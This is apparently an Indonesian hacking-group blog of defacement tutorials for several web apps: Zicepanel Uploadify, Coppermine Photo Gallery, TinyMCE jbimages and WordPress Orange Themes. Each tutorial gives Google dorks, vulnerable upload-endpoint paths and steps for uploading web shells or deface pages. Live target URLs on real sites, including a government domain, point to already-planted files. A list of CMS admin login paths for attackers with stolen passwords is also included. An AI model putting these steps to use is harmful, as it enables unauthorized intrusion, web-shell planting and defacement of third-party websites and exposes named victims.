Deface Zicepanel Exploit Uploadify


Yo Gayn :'v Kali Ini Saya Mau Share Tutorial Deface Zicapanel With Exploit Uploadify Langsung Aja Gayn

Dork : inurl:/themes/zicepanel/

Exploit: /themes/zicepanel/components/uploadify/uploadify.php

Csrf Online : Klik Gayn

LiveTarget:https://www.meridahammocks.com

Pertama Kalian Dorking Dolo Digoogle:')

Pilih Salah Satu Web/Target (+)Exploitnya Yang Diatas Kalo Vuln? Blank Kek Gambar Dibawah Ini

Nah Langsung Deh Bukan Csrf Onlinenya
Post File : Filedata

Nah Abis Itu Klik Simpan :') Upload Deh Shell/Sc Kalian :') Gan Degan :'v
Kalo Berhasil Upload Nanti Ada Random Angka/Huruf Kek Gambar Dibawah Ini

Nah Kalian Copy Deh Random Angka/Hurufnya :') Tambahin Dibelakang Sitenya
Example: https://www.meridahammocks.com/icTBZnUYrImv2Npqxl3dfo5RAzykXC8E.html


Tadaaaaaa Jreng Jreng Gampang Kan Ajg >:)

Ok Sekian Gayn Tutorial Dari Saya Semoga Bermanfaat :') Kalo Ketikan Saya Kurang Bisa Dipahami Ya Maklumin Ajg >:)


Thanks To All Member Phantom Ghost

Daftar CMS Admin Login


Ok Guys :'v Disini Gue Mau Share Daftar Admin Login Pada CMS :') Mungkin Buat Defacer Yang Sudah Mendapatkan User Dan Passwordnya  Tapi Bingung Cari Tempat Admin Loginya :v Kwowkwkw

Maka Dari Itu Gue Mau Share Daftar Cms Admin Login Langsung Aja Gayn Simak Ya Ajg

Joomla = administrator
Example : site.lo/administrator


WordPress = wp-login.php
Example : site.lo/wp-login.php

Lokomedia = admin / adminweb / administrator / redaktur
Example : site.lo/admin site.lo/adminweb site.lo/administrator site.lo/redaktur

OpenCart = admin
Example : site.lo/admin

ZenCart = admin
Example : site.lo/admin

Drupal = ?q=user
Example : site.lo/?q=user

Magento = admin
Example : site.lo/admin

Oalah Ajg Capek Gue Ngetik :vooss :'v
Kalo Masih Ada Yang Kurang Harap Dimaklumi Gayn (KAN LO BISA CARI SENDIRI AJG GOOGLE MASIH BUKA)

Oke Segitu Aja Dari Gue Semoga Bermanfaat Gayn

Thanks To All Member PHANTOM GHOST

Deface Coppermine Photo Gallery File Upload


Yo Balik Lagi Sama Gue Orang Gans :'v00s Kali Ini Gue Mau Kasih Tutorial Deface Coppermine Photo Gallery File Upload Langsung Aja Ya Gayn

Dork : intext:"Powered by Coppermine Photo Gallery" intitle:Upload file

Live: http://valdostayachtclub.com/gallery/upload.php?single=1

Langsung Aja Dorking Di Google Pakai Dork Yang Diatas :')
Pilih Salah Satu Web/Target Kalo Vuln Ada Tempat Upload Kek Gambar Dibawah Ini

Nah Langsung Upload Aja Deh File Kalian
Nb : Only Accept Type File (jpg,png,gif,txt,pdf,asx,asf,wav,mid)

Disini Gue Upload File txt
Kalo Berhasil Tampilannya Kek Gambar Dibawah Ini

Location File? http://target.lu/[path]/albums/userpics/file.lu

Example: http://valdostayachtclub.com/gallery/albums/userpics/pg.txt

Tadaaaaaa :'v Mudah Kan Babyk Semoga Bermanfaat Yah Gayn :')

Thanks To All Member PHANTOM GHOST

Deface Plugins JBIMAGES


Yo Kali Ini Gue Mau Kasih Tutorial Cara Deface Menggunakan Plugins Jbimages Langsung Aja Gayn

Dork : inurl:tiny_mce/plugins/jbimages/

Exploit : [path]/tiny_mce/plugins/jbimages/dialog-v4.htm

Live: http://desabligo.magelangkab.go.id

Kalian Dorking Dolo Digoogle Pake Dork Diatas
Pilih Salah Satu Web/Target Tambahin Exploitnya
Example: http://desabligo.magelangkab.go.id/assets/tiny_mce/plugins/jbimages/dialog-v4.htm

Kalo Vuln Nanti Ada Tempat Upload Kek Gambar Dibawah Ini


Upload Deh File Image Kalian :'v Kalo Sukses Nanti Akan Kek Gambar Dibawah Ini

Ada Bacaan Upload Complete

Location File?:'v http://target.lu/[path]/assets/images/file lu.jpg
Example : http://desabligo.magelangkab.go.id/assets/images/pg.jpg

Mudah Kan :'v Semoga Bermanfaat Gayn

Thanks To All Member PHANTOM GHOST

Deface WordPress Orange Themes


Yo Kali Ini Gue Mau Kasih Tutorial Deface Wp Orange Themes Yo Langsung Aja Gayn

Dork : inurl:/wp-content/themes/kernel-theme

inurl:/wp-content/themes/bordeaux-theme

inurl:/wp-content/themes/bulteno-theme

inurl:/wp-content/themes/rayoflight-theme

Exploit : /functions/upload-handler.php

Csrf Online : Klik Jancok


Kalian Dorking Dolo Di Google :"v
Pilih Salah Satu Web/Target Tambahin Exploitnya
Vuln?= Ada bacaan Error
Contoh Seperti Gambar Di Bawah Ini

Lalu Kalian Bukan Csrf Onlinenya
Dengan Post File : orange_themes
Example :

Kemudian Klik Submit Nah Terus Upload Deh Shell/Sc Lu :') Kalo Sukses Nanti Keluar Nama File Kalian
Example :


Nb : Apabila Lu Upload Ext:php terus muncul bacaan no.php Berarti Ga bisa up Shell wkplwkpksllmsko :'( SO SAD JANCOK

Location File?:'v /wp-content/uploads/[tahun]/[bulan]/file lu


Example : http://youngpetro.org/wp-content/uploads/2019/04/alqi.html

Nih Gue Kasih Live Target :'v
http://youngpetro.org/wp-content/themes/kernel-theme/functions/upload-handler.php

http://www.agenziaannalisa.it/wp-content/themes/kernel-theme/functions/upload-handler.php

http://howbc.org/wp-content/themes/rayoflight-theme/functions/upload-handler.php

Semoga Bermanfaat Yah Kntl

Thanks To All Member PHANTOM GHOST

Deface Zicepanel Exploit Uploadify

Yo Gayn :'v Kali Ini Saya Mau Share Tutorial Deface Zicapanel With Exploit Uploadify Langsung Aja Gayn Dork : inurl:/themes/zicepan...